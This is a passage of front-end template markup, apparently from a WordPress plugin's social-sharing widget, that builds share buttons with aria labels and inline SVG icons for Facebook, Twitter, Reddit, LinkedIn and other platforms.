) ? 'has-counter' : '' }} {{ ( 'native' === service_type && 'none' !== click_counter && _.isTrue(floating_inline_count) ) ? 'hustle-social-inline' : '' }}" aria-label="Share on <# if ( 'facebook' === key ) { #>Facebook<# } #><# if ( 'twitter' === key ) { #>Twitter<# } #><# if ( 'google' === key ) { #>Google Plus<# } #><# if ( 'pinterest' === key ) { #>Pinterest<# } #><# if ( 'reddit' === key ) { #>Reddit<# } #><# if ( 'linkedin' === key ) { #>Linkedin<# } #><# if ( 'vkontakte' === key ) { #>Vkontakte<# } #><# if ( 'fivehundredpx' === key ) { #>500px<# } #><# if ( 'houzz' === key ) { #>Houzz<# } #><# if ( 'instagram' === key ) { #>Instagram<# } #><# if ( 'twitch' === key ) { #>Twitch<# } #><# if ( 'youtube' === key ) { #>YouTube<# } #><# if ( 'telegram' === key ) { #>Telegram<# } #>"> <div class="hustle-icon-container" aria-hidden="true"> <# if ( 'facebook' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_facebook"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M53.937 140V66.316H39.2V44.21h14.737V29.475C53.937 9.962 61.173 0 83.41 0h18.422v22.105H90.78c-8.696 0-11.054 4.82-11.054 11.053V44.21h22.106l-3.685 22.106h-18.42V140h-25.79z"/></g></svg> <# } #> <# if ( 'twitter' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_twitter"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M140 27.243c-5.147 2.265-10.682 3.78-16.504 4.456 5.937-3.493 10.5-9.044 12.625-15.633-5.558 3.23-11.686 5.61-18.24 6.844-5.215-5.484-12.676-8.91-20.937-8.91C81.065 14 68.21 26.642 68.21 42.298c0 2.19.238 4.34.732 6.416C45.066 47.536 23.9 36.26 9.726 19.147c-2.446 4.2-3.88 9.06-3.88 14.24 0 9.81 5.066 18.48 12.792 23.53-4.728-.14-9.142-1.41-13.013-3.517-.04.107-.04.24-.04.37 0 13.705 9.93 25.11 23.076 27.714-2.413.642-4.94.996-7.56.996-1.87 0-2.907-.61-4.628-.947 3.648 11.242 12.14 18.704 24.707 18.95-9.793 7.578-19.462 12.355-32.944 12.355-2.314 0-6.004.255-8.236 0 12.7 8.02 27.788 13.185 44.037 13.185 52.816 0 81.715-43.09 81.715-80.463 0-1.236-.008-2.447-.074-3.65 5.6-4.002 10.468-8.992 14.322-14.667z"/></g></svg> <# } #> <# if ( 'google' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_google"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M.118 65.574C.5 42.667 21.56 22.606 44.468 23.37c10.975-.51 21.293 4.267 29.7 10.975-3.588 4.077-7.304 8.004-11.273 11.677-10.106-6.984-24.478-8.98-34.584-.913-14.455 9.998-15.114 33.606-1.208 44.368 13.523 12.272 39.083 6.18 42.82-12.61-8.47-.127-16.963 0-25.433-.276-.023-5.053-.044-10.105-.023-15.157 14.16-.042 28.32-.065 42.502.042.848 11.89-.723 24.542-8.026 34.37-11.06 15.562-33.266 20.105-50.59 13.44-17.387-6.625-29.7-24.99-28.236-43.713zm114.47-16.9h12.632c.02 4.226.042 8.472.085 12.696 4.225.044 8.47.044 12.695.086v12.632c-4.224.042-8.45.063-12.695.106-.043 4.245-.064 8.47-.085 12.695h-12.653c-.042-4.226-.042-8.45-.085-12.675l-12.695-.127V61.456c4.225-.042 8.45-.063 12.695-.086.022-4.245.064-8.47.106-12.695z"/></g></svg> <# } #> <# if ( 'pinterest' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_pinterest"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M72.333 0c-38.352 0-57.71 27.347-57.71 50.314 0 13.736 5.21 25.986 16.37 30.59 1.96.833 3.525 0 4.225-1.975.264-1.354 1.112-5.002 1.408-6.418.536-2.03.287-2.753-1.136-4.58-3.088-3.742-5.343-8.65-5.343-15.712 0-20.378 15.22-38.5 39.752-38.5 21.442 0 33.412 13.19 33.412 30.823C103.312 67.73 93 87.32 77.778 87.32c-8.455 0-14.638-6.983-12.67-15.516 2.528-10.157 7.186-21.202 7.186-28.544 0-6.557-3.523-12.14-10.842-12.14-8.633 0-15.516 8.92-15.516 20.804 0 7.693 2.527 12.857 2.527 12.857s-8.866 37.187-10.422 43.806c-3.094 12.98-.427 28.84-.28 30.52.28.933 1.393 1.19 1.97.505.83-1.072 10.997-13.773 14.652-26.303.856-3.67 5.64-22.113 5.64-22.113 2.83 5.29 11.005 9.987 19.46 9.987 25.938.01 43.407-22.89 43.407-54.513C122.89 22.867 102.915 0 72.332 0z"/></g></svg> <# } #> <# if ( 'reddit' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_reddit"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M63.705 45.273l15.353-31.32.996-2.033 2.185.446 23.464 4.787c1.633-4.562 5.925-7.82 10.963-7.82 6.443 0 11.666 5.328 11.666 11.9 0 6.573-5.223 11.9-11.666 11.9-5.843 0-10.682-4.38-11.534-10.096l-22.008-4.78L70.27 45.035c13.96.045 26.763 3.592 36.772 9.473 2.942-5.636 8.76-9.474 15.458-9.474 9.665 0 17.5 7.992 17.5 17.85 0 8.057-5.233 14.867-12.42 17.087.496 2.185.753 4.428.753 6.713 0 23.003-26.116 41.65-58.333 41.65s-58.333-18.647-58.333-41.65c0-2.285.257-4.528.754-6.713C5.234 77.75 0 70.94 0 62.883c0-9.858 7.835-17.85 17.5-17.85 6.697 0 12.516 3.838 15.458 9.474 8.55-5.024 19.14-8.345 30.747-9.234zM50.688 110.27c4.91 2.005 11.294 3.188 19.312 3.188s14.4-1.183 19.312-3.187c3.106-1.267 5.08-2.608 6.084-3.633l-4.125-4.207c-.452.462-1.76 1.352-4.124 2.316-4.203 1.715-9.85 2.762-17.146 2.762-7.295 0-12.943-1.047-17.146-2.762-2.363-.964-3.672-1.854-4.125-2.316l-4.126 4.207c1.005 1.025 2.978 2.366 6.084 3.634zm-1.105-23.587c4.833 0 8.75-3.996 8.75-8.925 0-4.93-3.917-8.925-8.75-8.925-4.832 0-8.75 3.996-8.75 8.925 0 4.93 3.918 8.925 8.75 8.925zm40.834 0c4.832 0 8.75-3.996 8.75-8.925 0-4.93-3.918-8.925-8.75-8.925-4.833 0-8.75 3.996-8.75 8.925 0 4.93 3.917 8.925 8.75 8.925z"/></g></svg> <# } #> <# if ( 'linkedin' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_linkedin"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M29.368 140H.878V47.412h28.49V140zm0-125.406c0 8.106-5.667 14.597-14.77 14.597h-.17C5.668 29.19 0 22.7 0 14.595 0 6.31 5.837 0 14.77 0c8.93 0 14.428 6.31 14.598 14.594zM75.846 140H47.21s.413-84.283 0-93.146h28.633l-.206 12.383c4.11-6.446 11.512-15.916 28.376-15.916C124.58 43.32 140 56.823 140 85.837V140h-28.68V87.248c0-12.696-7.095-19.145-18.407-19.145-8.635 0-13.778 5.842-16.038 11.486-.826 2.012-1.03 4.835-1.03 7.658V140z"/></g></svg> <# } #> <# if ( 'vkontakte' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_vkontakte"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" fill-rule="nonzero" d="M139.258 105.862c-.17-.378-.328-.69-.475-.942-2.43-4.52-7.07-10.067-13.922-16.644l-.217-.225c-3.256-3.137-5.225-5.196-6.05-6.25-1.51-2.01-1.847-4.042-1.022-6.102.584-1.556 2.772-4.842 6.56-9.864 1.995-2.66 3.573-4.794 4.74-6.4 8.406-11.55 12.05-18.928 10.933-22.14l-.434-.752c-.293-.452-1.046-.866-2.26-1.243-1.216-.378-2.77-.44-4.666-.19l-20.992.15c-.34-.124-.826-.112-1.46.04l-.947.225-.365.19-.29.226c-.243.15-.51.414-.802.79-.29.376-.533.816-.727 1.318-2.285 6.075-4.883 11.723-7.8 16.944-1.798 3.114-3.45 5.812-4.957 8.096-1.506 2.284-2.77 3.967-3.79 5.045-1.02 1.08-1.943 1.945-2.77 2.598-.827.655-1.458.93-1.894.83-.44-.1-.852-.2-1.242-.302-.68-.452-1.227-1.067-1.64-1.845-.413-.778-.692-1.757-.838-2.937-.145-1.18-.23-2.196-.255-3.05-.023-.853-.012-2.06.037-3.615.05-1.556.073-2.61.073-3.162 0-1.908.036-3.98.11-6.213.072-2.234.132-4.005.18-5.31.05-1.304.074-2.685.074-4.14 0-1.457-.087-2.6-.256-3.428-.168-.828-.425-1.63-.764-2.41-.34-.778-.84-1.38-1.494-1.807-.656-.427-1.47-.766-2.442-1.017-2.576-.603-5.856-.928-9.84-.98-9.04-.1-14.847.504-17.422 1.81-1.02.55-1.944 1.304-2.77 2.258-.875 1.106-.997 1.71-.365 1.808 2.916.45 4.98 1.53 6.195 3.237l.438.905c.34.653.68 1.808 1.02 3.464.34 1.657.56 3.49.657 5.496.242 3.666.242 6.804 0 9.414-.244 2.612-.473 4.644-.693 6.1-.22 1.456-.547 2.636-.984 3.54-.438.903-.73 1.456-.875 1.656-.146.2-.267.327-.364.377-.63.25-1.287.377-1.967.377-.68 0-1.507-.352-2.48-1.055-.97-.704-1.978-1.67-3.023-2.9-1.045-1.23-2.224-2.95-3.536-5.16-1.312-2.208-2.672-4.82-4.082-7.83l-1.166-2.185c-.73-1.406-1.724-3.452-2.988-6.138s-2.382-5.285-3.353-7.795c-.388-1.054-.972-1.857-1.75-2.41l-.364-.226c-.242-.2-.63-.413-1.165-.64-.535-.227-1.093-.39-1.677-.49l-19.972.15c-2.04 0-3.426.478-4.155 1.432l-.29.452c-.146.25-.22.653-.22 1.205 0 .553.146 1.23.438 2.033 2.915 7.08 6.086 13.907 9.512 20.484 3.425 6.577 6.402 11.875 8.928 15.89 2.527 4.016 5.103 7.807 7.727 11.37 2.624 3.566 4.36 5.85 5.21 6.854.852 1.005 1.52 1.757 2.007 2.26l1.822 1.806c1.166 1.205 2.88 2.65 5.14 4.33 2.26 1.683 4.76 3.34 7.507 4.972 2.747 1.63 5.942 2.96 9.587 3.99 3.644 1.03 7.19 1.443 10.642 1.244H76.9c1.7-.152 2.988-.704 3.863-1.657l.29-.377c.195-.3.378-.765.546-1.392.172-.626.257-1.317.257-2.07-.05-2.158.11-4.103.472-5.835.363-1.73.777-3.037 1.24-3.916.463-.88.985-1.62 1.566-2.22.583-.604.998-.968 1.242-1.094.242-.126.435-.212.58-.263 1.167-.402 2.54-.013 4.12 1.168 1.58 1.18 3.062 2.637 4.447 4.37 1.385 1.732 3.05 3.676 4.993 5.834 1.945 2.16 3.645 3.765 5.102 4.82l1.458.904c.973.603 2.236 1.156 3.792 1.658 1.552.5 2.912.627 4.08.376l18.66-.3c1.846 0 3.282-.316 4.3-.943 1.02-.628 1.628-1.32 1.823-2.072.195-.753.206-1.607.037-2.562-.173-.952-.343-1.618-.512-1.994z"/></g></svg> <# } #> <# if ( 'fivehundredpx' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_fivehundredpx"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M136.3,62.8c-4-6-9.8-8.9-17.1-9.3c-9-0.5-15.9,3.5-21.8,9.4c-1.6,1.6-3.1,3.3-4.7,5c-2.2-2.2-4.3-4.5-6.5-6.5 c-5.4-5-11.7-8.2-19.5-7.9c-8.8,0.3-15.3,4-19.2,11.6c-0.2,0.4-0.4,0.8-0.7,1.5c-3.1-5.6-7.5-9.3-13.9-10.3 c-6.1-1-11.9-0.2-17.1,4.5c0.6-3.6,1.2-6.7,1.8-9.8c0-0.1,0.1-0.2,0.1-0.3c0.8-4,0.8-4,5.2-4h22.7V36.2H8.7 C7.4,43.2,6,50.3,4.7,57.4C4,61,3.3,64.7,2.6,68.3c-0.1,0.6-0.2,1.3-0.3,2.1c3.9,0,7.7,0,11.4,0c0.3,0,0.7-0.4,1-0.6 c4.5-4.6,10.6-5.6,15.4-2.7c4.8,2.9,6.6,9.3,4.2,15c-3,7.3-12.7,9.4-18,3.8c-1.5-1.6-2.2-3.8-3.5-6H0c0.4,2,0.6,4.1,1.3,6 c2.6,7.3,8.4,11,16,12.7c1.1,0.3,2.2,0.5,3.4,0.7h7.8c1.8-0.5,3.7-0.9,5.4-1.6c5.8-2.2,10.1-6,12.9-11.5c0.2,0.3,0.5,0.6,0.6,0.8 c5.8,11.7,20.5,14.4,30.9,9.6c4.3-2,7.8-4.9,11-8.2c1-1.1,2.1-2.1,3-2.9c1.9,1.6,3.7,3.1,5.5,4.7c5.6,5,11.9,8.6,19.9,8.6 c11.5,0,20.2-7.1,22-17.9C140.6,74.5,140,68.3,136.3,62.8z M70.8,85.8c-3.9,1-7.7,0.7-10.6-2.3c-3-3-3.5-6.8-2.3-10.7 c1.9-6,7.4-8.5,13.5-6.2c5.3,2,9.2,5.8,13.2,9.8C80.8,80.6,76.6,84.3,70.8,85.8z M124.3,84.2c-3.3,2.8-7.3,2.6-11.2,1.4 c-4.3-1.3-9.4-5.1-12.6-9.2c3.3-3.3,6.4-6.7,10.6-8.8c3.9-2,8-2.6,11.9-0.1C128.8,70.8,129.4,80,124.3,84.2z"/></g></svg> <# } #> <# if ( 'houzz' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_houzz"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><polygon class="hustle-icon-path" points="70,0 70,46.6 28,70 28,23.4 "/><polygon class="hustle-icon-path" points="70,93.3 28,116.6 28,70 "/><polygon class="hustle-icon-path" points="112,70 112,116.6 70,140 70,93.3 "/><polygon class="hustle-icon-path" points="112,23.4 112,70 70,46.6 "/></g></svg> <# } #> <# if ( 'instagram' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_instagram"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M139.9,49.1c-0.1-6.1-0.4-12.2-1.6-18.1c-2.7-14-11.1-23.6-24.7-28.2c-6.3-2.1-12.8-2.6-19.4-2.6C79.2,0,64.1,0,49.1,0 C43,0,36.8,0.2,30.9,1.5c-14,3.1-23.6,11.2-28.2,25c-2.1,6.2-2.6,12.7-2.6,19.1C0,60.7,0,75.8,0.1,90.9C0.1,97,0.2,103,1.5,109 c3.1,14,11.1,23.6,24.9,28.2c6.2,2.2,12.7,2.6,19.3,2.6c8.1,0.2,16.2,0.1,24.3,0.1v0.1c6.6,0,13.3,0.1,19.9-0.1 c6.4-0.1,12.9-0.1,19.2-1.5c13.9-3.1,23.5-11.3,28.2-25c2.1-6.2,2.5-12.7,2.6-19.2C140,79.2,140.1,64.1,139.9,49.1z M126.8,96.7 c-0.2,3.7-0.5,7.5-1.5,11c-2.5,10.6-9.6,16.5-20.1,18.3c-4.7,0.8-9.4,0.9-14.2,1c-12.2,0.2-24.4,0.2-36.6,0.2 c-5.9-0.1-11.9-0.3-17.7-0.9c-13.1-1.2-21.9-10-23.2-23c-0.5-5.4-0.7-10.8-0.8-16.3c-0.2-11.4-0.2-22.8,0-34.1 c0.2-6.5,0.3-12.9,1.5-19.2c2.2-11.8,10.5-19.1,22.6-20c8.4-0.6,16.8-0.8,25.2-0.9c8.5-0.1,16.9-0.1,25.3,0.1 c6.5,0.2,13,0,19.4,1.4c10.6,2.3,17.7,9.7,19.3,20.5c0.6,4.5,0.9,9.2,1,13.8c0.2,7.2,0,14.4,0,21.5h0.4 C127.2,78.9,127.1,87.8,126.8,96.7z"/><path class="hustle-icon-path" d="M115.8,32.7c0,4.7-3.8,8.5-8.5,8.5s-8.6-3.9-8.6-8.6c0-4.7,3.8-8.5,8.6-8.4C112.2,24.2,115.9,27.9,115.8,32.7z"/><path class="hustle-icon-path" d="M70.2,34C50.1,33.9,34,49.8,34,69.7C33.9,89.9,49.8,106,69.8,106C89.9,106,106,90,106,70.1S90,34,70.2,34z M70.1,93.2 C57.4,93.3,46.7,82.7,46.7,70S57.3,46.7,70,46.7c12.7,0,23.3,10.7,23.3,23.3C93.2,82.7,82.7,93.2,70.1,93.2z"/></g></svg> <# } #> <# if ( 'twitch' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_twitch"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" /><path class="hustle-icon-path" d="M15.9,0c-0.6,0-0.8,0.2-1.1,0.7C11.4,9,7.9,17.2,4.4,25.5c-0.1,0.2-0.2,0.4-0.3,0.6v95.4h32.1c0.2,0,0.6,0,0.8,0.1V140 h17.7c0.4,0,0.7-0.2,1-0.4c5.8-5.8,11.6-11.7,17.5-17.6c0.3-0.3,0.7-0.4,1.1-0.4h24.2c0.6,0,0.9-0.2,1.3-0.5 c11.9-12,23.7-23.9,35.6-35.8c0.2-0.2,0.3-0.2,0.5-0.4V0H15.9z M121.3,76.8c0,0.4-0.2,0.7-0.5,1.1c-5.8,5.8-11.6,11.8-17.5,17.6 c-0.2,0.3-0.6,0.4-1.1,0.4H70.7c-0.5,0-0.8,0.2-1.2,0.5c-5.8,5.8-11.5,11.6-17.3,17.5c-0.2,0.1-0.3,0.2-0.6,0.5V95.9 c-0.3-0.1-0.6-0.1-0.8-0.1H30.5c-0.8,0-0.8,0-0.8-0.7V14.7h91.7V76.8z"/><rect class="hustle-icon-path" x="81" y="36.9" width="18.1" height="36.7"/><rect class="hustle-icon-path" x="51.8" y="36.9" width="18.1" height="36.7"/></g></svg> <# } #> <# if ( 'youtube' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_youtube"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M50.6,45.4v47.3c16.4-7.8,31.8-15.5,48-23.3C83.1,61.1,66.9,53.2,50.6,45.4 M56.9,23.8h25.5 c0.9,0,1.5,0,2.4,0c5.5,0,11.6,0,17,0.9c2.4,0,5.5,0,7.8,0c3.9,0,7,0.9,10.9,0.9c1.5,0,3.9,0.9,5.5,0.9c6.1,3.1,10,7,11.6,13.1 c0.9,3.9,1.5,7.8,1.5,11.6c0.9,4.6,0.9,9.4,0.9,13.1v15.5c0,0,0,0,0,0.9c0,6.1-0.9,12.4-1.5,17.9c-0.9,2.4-0.9,4.6-2.4,6.1 c-3.1,5.5-7.8,9.4-14.8,10c-3.1,0.9-7,0.9-10,0.9c-4.6,0-9.4,0.9-13.1,0.9c-4.6,0-10,0-14.8,0c0,0,0,0-0.9,0H57.6c0,0,0,0-0.9,0 c-4.6,0-9.4,0-14.8,0c-3.9,0-7.8,0-11.6-0.9c-3.9,0-7-0.9-10.9-0.9c-1.5,0-3.9,0-5.5-0.9c-6.1-1.5-10-5.5-11.6-11.6 C1.5,99,0.9,96,0,92.7c0.9-3.1,0-7,0-10.9c0-8.5,0-17,0-25.5c0-5.5,0.9-10.9,2.4-16.4c1.5-7,7-12.4,14.8-14 c2.4-0.9,4.6-0.9,7.8-0.9c3.9,0,7.8-0.9,12.4-0.9C43.6,23.8,50.6,23.8,56.9,23.8"/></g></svg> <# } #> <# if ( 'telegram' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_telegram"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/> <path class="hustle-icon-path" style="fill-opacity: 0.5;" d="M112.8,37.2c-2.5,2.3-55.4,49.5-56.3,50.2c-0.9,0.7-0.9,1.8,0,2.5c0.3,0.2,8.4,6.1,18,13 c-4.8,4.8-12.6,12.2-15.9,15.3c-4.4,4-8.7,3.5-9.6,0.7c-1.6-5-12-38.6-12-38.6s1.2-0.7,3.3-2.1c11.8-7.3,52.1-32.3,65-40.5 c1.6-1,2.8-1.7,3.5-2.1c0.2-0.2,0.4-0.3,0.5-0.3c1.3-0.9,2.4-1.4,3.2-1.6c0.2-0.2,0.3-0.2,0.4-0.2c0.3-0.1,0.6-0.1,0.8-0.1h0.1 c0.1,0,0.2,0,0.4,0c0.3,0,0.5,0.1,0.6,0.2C115.3,34.1,115.3,35,112.8,37.2z"/> <path class="hustle-icon-path" d="M139.4,23.5c-1.2,5.9-19.4,91.3-21.1,97.8c-1.6,6.5-7.6,8.1-13.3,3.8c-3.3-2.5-18.2-13.3-30.6-22.3 c-9.6-6.9-17.6-12.8-18-13c-0.9-0.7-0.9-1.8,0-2.5s53.9-47.9,56.3-50.2c2.6-2.2,2.6-3.1,1.9-3.5c-0.1-0.1-0.4-0.2-0.6-0.2 c-0.1,0-0.2,0-0.4,0h-0.1c-0.3,0-0.5,0-0.8,0.1c-0.2,0-0.2,0-0.4,0.2c-0.8,0.2-1.9,0.7-3.2,1.6c-0.1,0.1-0.3,0.2-0.5,0.3 c-0.7,0.4-1.8,1.1-3.5,2.1c-12.9,8.2-53.2,33.1-65,40.5c-2.1,1.3-3.3,2.1-3.3,2.1s-23-7.7-32.7-10.7c-8.8-2.6-1.3-7.7,2.6-9.2 c3.9-1.6,118.7-45.2,122.8-46.7C139.9,9.8,141,16.1,139.4,23.5z"/> </g></svg> <# } #> </div> <# if ( 'native' === service_type ) { if ( 'click' === click_counter ) { #> <div class="hustle-shares-counter"><span>{{ icon.counter }}</span></div> <# } else if ( 'native' === click_counter && _.isFalse( _.isUndefined( icon.native_counter ) ) && icon.native_counter !== 0 ) { #> <div class="hustle-shares-counter"><span>{{ icon.native_counter }}</span></div> <# } else if ( false ) { #> <div class="hustle-shares-counter"><span>9</span></div> <# } } #> </a> <# } ); } #> </div> <# } else { #> <div class="hustle-shares-widget {{ ( _.isTrue(widget_animate_icons) ) ? 'hustle-shares-animated' : '' }}"> <div class="hustle-shares-wrap"> <# if ( !_.isEmpty(social_icons) ) { _.each( social_icons, function( icon, key ){ #> <a data-social="{{key}}" href="{{ ( 'custom' === service_type ) ? icon.link : '#' }}" {{ ( 'custom' === service_type ) ? 'target="_blank"' : '' }} class="hustle-social-icon hustle-social-icon-{{service_type}} hustle-social-icon-counter-{{click_counter}} hustle-icon-{{icon_style}} {{ ( _.isFalse(customize_widget_colors) ) ? 'hustle-icon-' + key : '' }} {{ ( 'flat' === icon_style && ( 'native' === service_type && 'none' !== click_counter ) ) ? 'has-counter' : '' }} {{ ( 'native' === service_type && 'none' !== click_counter && _.isTrue(widget_inline_count) ) ? 'hustle-social-inline' : '' }}" aria-label="Share on <# if ( 'facebook' === key ) { #>Facebook<# } #><# if ( 'twitter' === key ) { #>Twitter<# } #><# if ( 'google' === key ) { #>Google Plus<# } #><# if ( 'pinterest' === key ) { #>Pinterest<# } #><# if ( 'reddit' === key ) { #>Reddit<# } #><# if ( 'linkedin' === key ) { #>Linkedin<# } #><# if ( 'vkontakte' === key ) { #>Vkontakte<# } #><# if ( 'fivehundredpx' === key ) { #>500px<# } #><# if ( 'houzz' === key ) { #>Houzz<# } #><# if ( 'instagram' === key ) { #>Instagram<# } #><# if ( 'twitch' === key ) { #>Twitch<# } #><# if ( 'youtube' === key ) { #>YouTube<# } #><# if ( 'telegram' === key ) { #>Telegram<# } #>"> <div class="hustle-icon-container" aria-hidden="true"> <# if ( 'facebook' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_facebook"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M53.937 140V66.316H39.2V44.21h14.737V29.475C53.937 9.962 61.173 0 83.41 0h18.422v22.105H90.78c-8.696 0-11.054 4.82-11.054 11.053V44.21h22.106l-3.685 22.106h-18.42V140h-25.79z"/></g></svg> <# } #> <# if ( 'twitter' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_twitter"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M140 27.243c-5.147 2.265-10.682 3.78-16.504 4.456 5.937-3.493 10.5-9.044 12.625-15.633-5.558 3.23-11.686 5.61-18.24 6.844-5.215-5.484-12.676-8.91-20.937-8.91C81.065 14 68.21 26.642 68.21 42.298c0 2.19.238 4.34.732 6.416C45.066 47.536 23.9 36.26 9.726 19.147c-2.446 4.2-3.88 9.06-3.88 14.24 0 9.81 5.066 18.48 12.792 23.53-4.728-.14-9.142-1.41-13.013-3.517-.04.107-.04.24-.04.37 0 13.705 9.93 25.11 23.076 27.714-2.413.642-4.94.996-7.56.996-1.87 0-2.907-.61-4.628-.947 3.648 11.242 12.14 18.704 24.707 18.95-9.793 7.578-19.462 12.355-32.944 12.355-2.314 0-6.004.255-8.236 0 12.7 8.02 27.788 13.185 44.037 13.185 52.816 0 81.715-43.09 81.715-80.463 0-1.236-.008-2.447-.074-3.65 5.6-4.002 10.468-8.992 14.322-14.667z"/></g></svg> <# } #> <# if ( 'google' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_google"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M.118 65.574C.5 42.667 21.56 22.606 44.468 23.37c10.975-.51 21.293 4.267 29.7 10.975-3.588 4.077-7.304 8.004-11.273 11.677-10.106-6.984-24.478-8.98-34.584-.913-14.455 9.998-15.114 33.606-1.208 44.368 13.523 12.272 39.083 6.18 42.82-12.61-8.47-.127-16.963 0-25.433-.276-.023-5.053-.044-10.105-.023-15.157 14.16-.042 28.32-.065 42.502.042.848 11.89-.723 24.542-8.026 34.37-11.06 15.562-33.266 20.105-50.59 13.44-17.387-6.625-29.7-24.99-28.236-43.713zm114.47-16.9h12.632c.02 4.226.042 8.472.085 12.696 4.225.044 8.47.044 12.695.086v12.632c-4.224.042-8.45.063-12.695.106-.043 4.245-.064 8.47-.085 12.695h-12.653c-.042-4.226-.042-8.45-.085-12.675l-12.695-.127V61.456c4.225-.042 8.45-.063 12.695-.086.022-4.245.064-8.47.106-12.695z"/></g></svg> <# } #> <# if ( 'pinterest' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_pinterest"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M72.333 0c-38.352 0-57.71 27.347-57.71 50.314 0 13.736 5.21 25.986 16.37 30.59 1.96.833 3.525 0 4.225-1.975.264-1.354 1.112-5.002 1.408-6.418.536-2.03.287-2.753-1.136-4.58-3.088-3.742-5.343-8.65-5.343-15.712 0-20.378 15.22-38.5 39.752-38.5 21.442 0 33.412 13.19 33.412 30.823C103.312 67.73 93 87.32 77.778 87.32c-8.455 0-14.638-6.983-12.67-15.516 2.528-10.157 7.186-21.202 7.186-28.544 0-6.557-3.523-12.14-10.842-12.14-8.633 0-15.516 8.92-15.516 20.804 0 7.693 2.527 12.857 2.527 12.857s-8.866 37.187-10.422 43.806c-3.094 12.98-.427 28.84-.28 30.52.28.933 1.393 1.19 1.97.505.83-1.072 10.997-13.773 14.652-26.303.856-3.67 5.64-22.113 5.64-22.113 2.83 5.29 11.005 9.987 19.46 9.987 25.938.01 43.407-22.89 43.407-54.513C122.89 22.867 102.915 0 72.332 0z"/></g></svg> <# } #> <# if ( 'reddit' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_reddit"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M63.705 45.273l15.353-31.32.996-2.033 2.185.446 23.464 4.787c1.633-4.562 5.925-7.82 10.963-7.82 6.443 0 11.666 5.328 11.666 11.9 0 6.573-5.223 11.9-11.666 11.9-5.843 0-10.682-4.38-11.534-10.096l-22.008-4.78L70.27 45.035c13.96.045 26.763 3.592 36.772 9.473 2.942-5.636 8.76-9.474 15.458-9.474 9.665 0 17.5 7.992 17.5 17.85 0 8.057-5.233 14.867-12.42 17.087.496 2.185.753 4.428.753 6.713 0 23.003-26.116 41.65-58.333 41.65s-58.333-18.647-58.333-41.65c0-2.285.257-4.528.754-6.713C5.234 